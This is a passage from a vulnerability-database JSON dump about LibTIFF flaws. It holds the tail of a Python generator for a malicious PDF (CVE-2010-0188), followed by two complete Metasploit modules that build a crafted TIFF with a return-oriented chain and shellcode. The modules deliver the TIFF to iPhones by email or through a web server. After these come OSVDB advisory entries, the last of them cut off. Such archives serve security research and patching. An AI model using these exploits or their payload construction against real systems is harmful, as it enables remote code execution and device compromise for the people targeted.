xml+'''\r\nendstream \r\nendobj \r\n2 0 obj \r\n<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>\r\nendobj \r\n3 0 obj \r\n<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>\r\nendobj \r\n4 0 obj \r\n<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>\r\nendobj \r\n5 0 obj \r\n<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>\r\nendobj \r\n6 0 obj \r\n<</Kids [5 0 R]/Type /Pages/Count 1>>\r\nendobj \r\n7 0 obj \r\n<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>\r\nendobj \r\n8 0 obj \r\n<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>\r\nendobj xref\r\ntrailer\r\n<</Root 7 0 R/Size 9>>\r\nstartxref\r\n14765\r\n%%EOF'''\r\n\t\treturn pdf\r\n\r\n\r\nif __name__==\"__main__\":\r\n\tprint __doc__\r\n\tif len(sys.argv) != 2:\r\n\t\tprint \"Usage: %s [output.pdf]\" % sys.argv[0]\r\n\r\n\tprint \"Creating Exploit to %s\\n\"% sys.argv[1]\r\n\texploit=CVE20100188Exploit(buf)\r\n\tf = open(sys.argv[1],mode='wb')\r\n\tf.write(exploit.gen_pdf())\r\n\tf.close()\r\n\tprint \"[+] done !\"\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/11787/"}, {"lastseen": "2016-02-02T17:27:42", "bulletinFamily": "exploit", "description": "Apple iOS MobileMail LibTIFF Buffer Overflow. CVE-2006-3459,CVE-2010-0188. Remote exploit for ios platform", "modified": "2012-10-09T00:00:00", "published": "2012-10-09T00:00:00", "id": "EDB-ID:21869", "href": "https://www.exploit-db.com/exploits/21869/", "type": "exploitdb", "title": "Apple iOS MobileMail LibTIFF Buffer Overflow", "sourceData": "##\r\n# $Id: mobilemail_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\t#\r\n\t# This module sends email messages via smtp\r\n\t#\r\n\tinclude Msf::Exploit::Remote::SMTPDeliver\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the version of\r\n\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\r\n\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\r\n\t\t\t\ttools installed will need to use a special payload.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm', 'kf'],\r\n\t\t\t'Version' => '$Revision: 15950 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3459'],\r\n\t\t\t\t\t['OSVDB', '27723'],\r\n\t\t\t\t\t['BID', '19283']\r\n\t\t\t\t],\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1800,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => '-bind -find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Arch' => ARCH_ARMLE,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\r\n\t\t\t\t\t\t\t# Scratch space for our shellcode and stack\r\n\t\t\t\t\t\t\t'Heap' => 0x00802000,\r\n\r\n\t\t\t\t\t\t\t# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\r\n\t\t\t\t\t\t\t'Magic' => 0x300d562c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 01 2006'\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\texts = ['jpg', 'tiff', 'tif']\r\n\r\n\t\tgext = exts[rand(exts.length)]\r\n\t\tname = rand_text_alpha(rand(10)+1) + \".#{gext}\"\r\n\t\tdata = Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\ttiff = generate_tiff(target)\r\n\r\n\t\tmsg = Rex::MIME::Message.new\r\n\t\tmsg.mime_defaults\r\n\t\tmsg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1)\r\n\t\tmsg.to = datastore['MAILTO']\r\n\t\tmsg.from = datastore['MAILFROM']\r\n\r\n\t\tmsg.add_part(Rex::Text.encode_base64(data, \"\\r\\n\"), \"text/plain\", \"base64\", \"inline\")\r\n\t\tmsg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + \".\" + gext)\r\n\r\n\t\tsend_message(msg.to_s)\r\n\r\n\t\tprint_status(\"Waiting for a payload session (backgrounding)...\")\r\n\tend\r\n\r\n\tdef generate_tiff(targ)\r\n\t\t#\r\n\t\t# This is a TIFF file, we have a huge range of evasion\r\n\t\t# capabilities, but for now, we don't use them.\r\n\t\t# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\r\n\t\t#\r\n\r\n\t\tlolz = 2048\r\n\t\ttiff =\r\n\t\t\t\"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\r\n\t\t\t[lolz].pack(\"V\") +\r\n\t\t\t\"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n\t\t# Randomize the bajeezus out of our data\r\n\t\thehe = rand_text(lolz)\r\n\r\n\t\t# Were going to candy mountain!\r\n\t\thehe[120, 4] = [targ['Magic']].pack(\"V\")\r\n\r\n\t\t# >> add r0, r4, #0x30\r\n\t\thehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\r\n\r\n\t\t# Candy mountain, Charlie!\r\n\t\t# >> mov r1, sp\r\n\r\n\t\t# It will be an adventure!\r\n\t\t# >> mov r2, r8\r\n\t\thehe[ 92, 4] = [ hehe.length ].pack(\"V\")\r\n\r\n\t\t# Its a magic leoplurodon!\r\n\t\t# It has spoken!\r\n\t\t# It has shown us the way!\r\n\t\t# >> bl _memcpy\r\n\r\n\t\t# Its just over this bridge, Charlie!\r\n\t\t# This magical bridge!\r\n\t\t# >> ldr r3, [r4, #32]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #32]\r\n\t\t# >> ldr r3, [r4, #36]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #36]\r\n\t\t# >> ldr r3, [r4, #40]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #40]\r\n\t\t# >> ldr r3, [r4, #44]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #44]\r\n\r\n\t\t# We made it to candy mountain!\r\n\t\t# Go inside Charlie!\r\n\t\t# sub sp, r7, #0x14\r\n\t\thehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\r\n\r\n\t\t# Goodbye Charlie!\r\n\t\t# ;; targ['Heap'] + 0x48 becomes the stack pointer\r\n\t\t# >> ldmia sp!, {r8, r10}\r\n\r\n\t\t# Hey, what the...!\r\n\t\t# >> ldmia sp!, {r4, r5, r6, r7, pc}\r\n\r\n\t\t# Return back to the copied heap data\r\n\t\thehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\r\n\r\n\t\t# Insert our actual shellcode at heap location + 196\r\n\t\thehe[196, payload.encoded.length] = payload.encoded\r\n\r\n\t\ttiff << hehe\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21869/"}, {"lastseen": "2016-02-02T17:27:33", "bulletinFamily": "exploit", "description": "Apple iOS MobileSafari LibTIFF Buffer Overflow. CVE-2006-3459,CVE-2010-0188. Remote exploit for ios platform", "modified": "2012-10-09T00:00:00", "published": "2012-10-09T00:00:00", "id": "EDB-ID:21868", "href": "https://www.exploit-db.com/exploits/21868/", "type": "exploitdb", "title": "Apple iOS MobileSafari LibTIFF Buffer Overflow", "sourceData": "##\r\n# $Id: safari_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\t#\r\n\t# This module acts as an HTTP server\r\n\t#\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the version of\r\n\t\t\t\tlibtiff shipped with firmware versions 1.00, 1.01, 1.02, and\r\n\t\t\t\t1.1.1 of the Apple iPhone. iPhones which have not had the BSD\r\n\t\t\t\ttools installed will need to use a special payload.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => ['hdm', 'kf'],\r\n\t\t\t'Version' => '$Revision: 15950 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-3459'],\r\n\t\t\t\t\t['OSVDB', '27723'],\r\n\t\t\t\t\t['BID', '19283']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1800,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\r\n\t\t\t\t\t# Multi-threaded applications are not allowed to execve() on OS X\r\n\t\t\t\t\t# This stub injects a vfork/exit in front of the payload\r\n\t\t\t\t\t'Prepend' =>\r\n\t\t\t\t\t\t[\r\n\t\t\t\t\t\t\t0xe3a0c042, # vfork\r\n\t\t\t\t\t\t\t0xef000080, # sc\r\n\t\t\t\t\t\t\t0xe3500000, # cmp r0, #0\r\n\t\t\t\t\t\t\t0x1a000001, # bne\r\n\t\t\t\t\t\t\t0xe3a0c001, # exit(0)\r\n\t\t\t\t\t\t\t0xef000080 # sc\r\n\t\t\t\t\t\t].pack(\"V*\")\r\n\t\t\t\t},\r\n\t\t\t'Arch' => ARCH_ARMLE,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\r\n\t\t\t\t\t[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\r\n\t\t\t\t\t\t\t# Scratch space for our shellcode and stack\r\n\t\t\t\t\t\t\t'Heap' => 0x00802000,\r\n\r\n\t\t\t\t\t\t\t# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib\r\n\t\t\t\t\t\t\t'Magic' => 0x300d562c,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Aug 01 2006'\r\n\t\t\t))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, req)\r\n\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Grab reference to the target\r\n\t\tt = target\r\n\r\n\t\tprint_status(\"Sending exploit\")\r\n\r\n\t\t# Transmit the compressed response to the client\r\n\t\tsend_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef generate_tiff(code, targ)\r\n\r\n\t\t#\r\n\t\t# This is a TIFF file, we have a huge range of evasion\r\n\t\t# capabilities, but for now, we don't use them.\r\n\t\t# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday\r\n\t\t#\r\n\r\n\t\tlolz = 2048\r\n\t\ttiff =\r\n\t\t\t\"\\x49\\x49\\x2a\\x00\\x1e\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\r\n\t\t\t\"\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x01\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xaa\\x00\\x00\\x00\\x06\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x11\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x17\\x01\\x04\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x15\\x00\\x00\\x00\\x1c\\x01\\x03\\x00\"+\r\n\t\t\t\"\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x50\\x01\\x03\\x00\"+\r\n\t\t\t[lolz].pack(\"V\") +\r\n\t\t\t\"\\x84\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\r\n\t\t# Randomize the bajeezus out of our data\r\n\t\thehe = rand_text(lolz)\r\n\r\n\t\t# Were going to candy mountain!\r\n\t\thehe[120, 4] = [targ['Magic']].pack(\"V\")\r\n\r\n\t\t# >> add r0, r4, #0x30\r\n\t\thehe[104, 4] = [ targ['Heap'] - 0x30 ].pack(\"V\")\r\n\r\n\t\t# Candy mountain, Charlie!\r\n\t\t# >> mov r1, sp\r\n\r\n\t\t# It will be an adventure!\r\n\t\t# >> mov r2, r8\r\n\t\thehe[ 92, 4] = [ hehe.length ].pack(\"V\")\r\n\r\n\t\t# Its a magic leoplurodon!\r\n\t\t# It has spoken!\r\n\t\t# It has shown us the way!\r\n\t\t# >> bl _memcpy\r\n\r\n\t\t# Its just over this bridge, Charlie!\r\n\t\t# This magical bridge!\r\n\t\t# >> ldr r3, [r4, #32]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #32]\r\n\t\t# >> ldr r3, [r4, #36]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #36]\r\n\t\t# >> ldr r3, [r4, #40]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #40]\r\n\t\t# >> ldr r3, [r4, #44]\r\n\t\t# >> ldrt r3, [pc], r3, lsr #30\r\n\t\t# >> str r3, [r4, #44]\r\n\r\n\t\t# We made it to candy mountain!\r\n\t\t# Go inside Charlie!\r\n\t\t# sub sp, r7, #0x14\r\n\t\thehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack(\"V\")\r\n\r\n\t\t# Goodbye Charlie!\r\n\t\t# ;; targ['Heap'] + 0x48 becomes the stack pointer\r\n\t\t# >> ldmia sp!, {r8, r10}\r\n\r\n\t\t# Hey, what the...!\r\n\t\t# >> ldmia sp!, {r4, r5, r6, r7, pc}\r\n\r\n\t\t# Return back to the copied heap data\r\n\t\thehe[192, 4] = [ targ['Heap'] + 196 ].pack(\"V\")\r\n\r\n\t\t# Insert our actual shellcode at heap location + 196\r\n\t\thehe[196, payload.encoded.length] = payload.encoded\r\n\r\n\t\ttiff << hehe\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21868/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.remotesensing.org/libtiff/\n[Vendor Specific Advisory URL](http://www.ubuntu.com/usn/usn-289-1)\n[Vendor Specific Advisory URL](http://www.trustix.org/errata/2006/0036/)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1091)\n[Secunia Advisory ID:20501](https://secuniaresearch.flexerasoftware.com/advisories/20501/)\n[Secunia Advisory ID:20766](https://secuniaresearch.flexerasoftware.com/advisories/20766/)\n[Secunia Advisory ID:20715](https://secuniaresearch.flexerasoftware.com/advisories/20715/)\n[Secunia Advisory ID:21002](https://secuniaresearch.flexerasoftware.com/advisories/21002/)\n[Secunia Advisory ID:20520](https://secuniaresearch.flexerasoftware.com/advisories/20520/)\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200607-03.xml\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Jun/0008.html\nMail List Post: http://archives.neohapsis.com/archives/vuln-dev/2006-q2/0076.html\nGeneric Exploit URL: http://www.genexx.org/nitrous/code/PoCs/tiffspl33t/tiffspl33t.tar.gz\n[CVE-2006-2656](https://vulners.com/cve/CVE-2006-2656)\n", "modified": "2006-05-23T03:51:07", "published": "2006-05-23T03:51:07", "href": "https://vulners.com/osvdb/OSVDB:26030", "id": "OSVDB:26030", "type": "osvdb", "title": "LibTIFF tiffsplit Filename Processing Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nLibTIFF contains an unspecified local overflow related to custom tag support in the TIFF library that may allow an attacker to execute arbitrary code. No further details have been provided.\n## Solution Description\nUpgrade to version 3.8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nLibTIFF contains an unspecified local overflow related to custom tag support in the TIFF library that may allow an attacker to execute arbitrary code. No further details have been provided.\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304063)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21253](https://secuniaresearch.flexerasoftware.com/advisories/21253/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27727](https://vulners.com/osvdb/OSVDB:27727)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\n[CVE-2006-3465](https://vulners.com/cve/CVE-2006-3465)\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27729", "id": "OSVDB:27729", "title": "LibTIFF Custom Tag Support Unspecified Issue", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:27181](https://secuniaresearch.flexerasoftware.com/advisories/27181/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:27222](https://secuniaresearch.flexerasoftware.com/advisories/27222/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory ID:21537](https://secuniaresearch.flexerasoftware.com/advisories/21537/)\n[Related OSVDB ID: 27725](https://vulners.com/osvdb/OSVDB:27725)\n[Related OSVDB ID: 27729](https://vulners.com/osvdb/OSVDB:27729)\n[Related OSVDB ID: 27724](https://vulners.com/osvdb/OSVDB:27724)\n[Related OSVDB ID: 27728](https://vulners.com/osvdb/OSVDB:27728)\n[Related OSVDB ID: 27723](https://vulners.com/osvdb/OSVDB:27723)\n[Related OSVDB ID: 27726](https://vulners.com/osvdb/OSVDB:27726)\nRedHat RHSA: RHSA-2006:0648\nRedHat RHSA: RHSA-2006:0603\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Aug/0001.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2006:137\nOther Advisory URL: http://www.ubuntu.com/usn/usn-330-1\nOther Advisory URL: http://www.us.debian.org/security/2006/dsa-1137\nOther Advisory URL: https://issues.rpath.com/browse/RPL-558\nOther Advisory URL: http://slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.536600\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-103099-1\n[CVE-2006-3463](https://vulners.com/cve/CVE-2006-3463)\n", "modified": "2006-08-02T08:49:09", "published": "2006-08-02T08:49:09", "href": "https://vulners.com/osvdb/OSVDB:27727", "id": "OSVDB:27727", "title": "LibTIFF EstimateStripByteCounts Function Malformed td_nstrips Value DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "description": "## Vulnerability Description\nA local overflow exists in LibTIFF. The NeXT RLE decoder fails to validate RLE image files resulting in a heap overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 3.8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA local overflow exists in LibTIFF. The NeXT RLE decoder fails to validate RLE image files resulting in a heap overflow. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200608-07.xml)\n[Vendor Specific Advisory URL](http://docs.info.apple.com/article.html?artnum=304063)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060901-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-166.htm)\n[Secunia Advisory ID:21290](https://secuniaresearch.flexerasoftware.com/advisories/21290/)\n[Secunia Advisory ID:21334](https://secuniaresearch.flexerasoftware.com/advisories/21334/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21632](https://secuniaresearch.flexerasoftware.com/advisories/21632/)\n[Secunia Advisory ID:27181](https://secuniaresearch.flexerasoftware.com/advisories/27181/)\n[Secunia Advisory ID:21319](https://secuniaresearch.flexerasoftware.com/advisories/21319/)\n[Secunia Advisory ID:21338](https://secuniaresearch.flexerasoftware.com/advisories/21338/)\n[Secunia Advisory ID:21392](https://secuniaresearch.flexerasoftware.com/advisories/21392/)\n[Secunia Advisory ID:21253](https://secuniaresearch.flexerasoftware.com/advisories/21253/)\n[Secunia Advisory ID:21501](https://secuniaresearch.flexerasoftware.com/advisories/21501/)\n[Secunia Advisory ID:22036](https://secuniaresearch.flexerasoftware.com/advisories/22036/)\n[Secunia Advisory ID:27222](https://secuniaresearch.flexerasoftware.com/advisories/27222/)\n[Secunia Advisory ID:21274](https://secuniaresearch.flexerasoftware.com/advisories/21274/)\n[Secunia Advisory ID:21304](https://secuniaresearch.flexerasoftware.com/advisories/21304/)\n[Secunia Advisory ID:21370](https://secuniaresearch.flexerasoftware.com/advisories/21370/)\n[Secunia Advisory 